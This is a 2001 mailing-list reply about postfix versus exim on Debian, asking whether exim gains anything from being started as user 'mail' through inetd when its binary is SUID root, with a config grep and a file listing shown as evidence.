On Sun, Nov 18, 2001 at 03:02:30PM +1000, Paul Haesler wrote: it is a Good Thing to have an MTA which does not run as root. I found the argument persuasive, and happily installed postifx. I do miss one thing from exim, however. Default debian installation of exim runs as mail: [EMAIL PROTECTED] procmail] grep exim /etc/inetd.conf smtpstream tcp nowait mail/usr/sbin/exim exim -bs I don't know much about exim's guts, but is there a point in starting it as mail if it's SUID root? -rwsr-xr-x1 root root 466308 sie 15 01:13 /usr/sbin/exim Marcin -- Marcin Owsiany [EMAIL PROTECTED] http://marcin.owsiany.pl/ GnuPG: 1024D/60F41216 FE67 DA2D 0ACA FC5E 3F75 D6F6 3A0D 8AA0 60F4 1216